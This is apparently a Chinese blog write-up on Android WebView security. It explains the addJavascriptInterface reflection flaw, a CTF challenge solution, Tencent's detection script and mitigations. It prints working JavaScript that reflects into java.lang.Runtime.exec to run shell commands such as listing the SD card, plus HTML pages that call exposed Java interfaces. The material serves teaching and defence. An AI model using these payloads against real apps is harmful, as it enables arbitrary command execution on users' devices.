首先是addJavaScriptInterface漏洞:
有时候访问手机百度贴吧网页版本,网页上会有个按钮提示用手机应用打开。这种交互通常都是使用JS来实现,而WebView已经提供了这样的方法,具体用法如下:
mWebView.getSettings().setJavaScriptEnabled(true); mWebView.addJavascriptInterface(new JSInterface(), "jsInterface");
向WebView注册一个名叫“jsInterface”的对象,然后在JS中可以访问到jsInterface这个对象,就可以调用这个对象的一些方法,最终可以调用到Java代码中,从而实现了JS与Java代码的交互。
This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level
JELLY_BEANor below, because JavaScript could use reflection to access an injected object's public fields.
在Jelly Bean之后,addJavaScriptInterface这个方法已经被取消了,但如果想要兼容这之前的设备,还必须使用。
通过这个漏洞,JavaScript可以访问SD卡上的文件。
JS中可以遍历window对象,找到存在“getClass”方法的对象的对象,然后再通过反射的机制,得到Runtime对象,然后调用静态方法来执行一些命令,比如访问文件的命令。
function execute(cmdArgs) { for (var obj in window) { if ("getClass" in window[obj]) { alert(obj); return window[obj].getClass().forName("java.lang.Runtime") .getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } } }
这样就可以执行一些command比如:
var p = execute(["ls","/mnt/sdcard/"]);
Alictf第三题便是要输入一个网址,点击那个网址可以调用那个addJavaScriptInterface的第二个对象(上面对应的jsInterface),如果你知道了那个对象的名字和方法,就可以这样构造一个html:
<html> <body> <script type="text/javascript"> function crack() { SmokeyBear.showToast() } crack() </script> </body> </html>
把这个html命名为aa.html,放到sdcard上,输入file:///sdcard/aa.html,就会触发应用程序的showToast()方法;也可以放到服务器上访问。
或者不知道SmokeyBear这个对象,可以这样:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script> function findobj(){ for (var obj in window) { if ("getClass" in window[obj]) { return window[obj] } } } </script> </head> <body> hellowrold! <script type="text/javascript"> var obj = findobj() obj.showToast() </script> </body> </html>
setJavaScriptEnabled
通过此API可以设置是否允许WebView使用JavaScript,默认是不允许,但很多应用,包括移动浏览器为了让WebView执行http协议中的javascript,都会主动设置允许WebView执行Javascript,而又不会对不同的协议区别对待,比较安全的实现是如果加载的url是http或https协议,则启用javascript,如果是其它危险协议,如是file协议,则禁用javascript。禁用file协议的javascript可以很大程度上减小跨源漏洞对WebView的威胁。
安全建议:
1.对于不需要使用file协议的应用,禁用file协议
2.对于需要使用file协议的应用,禁止file协议调用javascript
腾讯实验室(http://security.tencent.com/index.php/opensource/detail/1)的解释:
漏洞原理:
在安卓WebView 组件中存在 addJavascriptInterface 方法,主要用于将Java类或方法导出以供JavaScript调用。但是,JavaScript在调用导出的Java类时,可通过反射执行任意JAVA代码。典型的攻击场景:通过受影响的app发送恶意构造页面的URL,用户点击打开URL后,会执行恶意代码。比如某安卓应用使用addJavascriptInterface 方法提供以下接口:this.b.addJavascriptInterface(new fz(this, null), "js_class_name");那么可构造恶意html页面,然后通过JavaScript调用该接口来执行系统命令:
js_class_name.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);修复方案:
1、如果无需与JS交互,请删除对addJavascriptInterface函数的调用;
2、在载入页面时对URL进行白名单判定,只有存在白名单中的域才允许导出或调用相关的Java类或方法;
它们给出的验证方案是用应用访问(http://security.tencent.com/lucky/check_tools.html)这个页面,它会给你提示是否有漏洞。
那个页面的中的算法是这样的:
<script type="text/javascript"> function check() { var res = 0; for (var obj in window) { try { if ("getClass" in window[obj]) { try{ window[obj].getClass(); document.getElementById("res_show").innerHTML = "<b><font color='red'>当心!您当前使用的APP可能存在Andriod WebView 挂马漏洞!请不要用这个APP打开不可信的外部链接!</font></b>"; res = 1; break; }catch(e){ } } } catch(e) { } } if(res==0) { document.getElementById("res_show").innerHTML = "<b><font color='green' size=6>恭喜!您当前的APP不存在Andriod WebView 挂马漏洞!请放心使用!</font></b>"; } } </script>
也就是遍历window,查找「getClass」,看有没有反射调用的地方,有就提示。
wooyun给出的方法也类似。下图是用alictf的jscrack访问http://drops.wooyun.org/webview.html得到的结果:
那是因为jscrack中为SmokeyBear这个街口定义了类似这样的shwoToast()方法:
-------------------------------------------------------------
除了addJavascriptInterface执行漏洞,还有UXXS漏洞:
通用型跨站脚本(UXSS,Universal Cross-Site Scfipting),主要是利用浏览器及插件的漏洞(比如同源策略绕过,导致A站的脚本可以访问B站的各种私有属性,例如cookie等)来构造跨站条件,以执行恶意代码。
参考:
http://blog.csdn.net/leehong2005/article/details/11808557
http://blogs.360.cn/360mobile/2014/09/22/webview%e8%b7%a8%e6%ba%90%e6%94%bb%e5%87%bb%e5%88%86%e6%9e%90/
http://bbs.pediy.com/showthread.php?t=192928&highlight=webview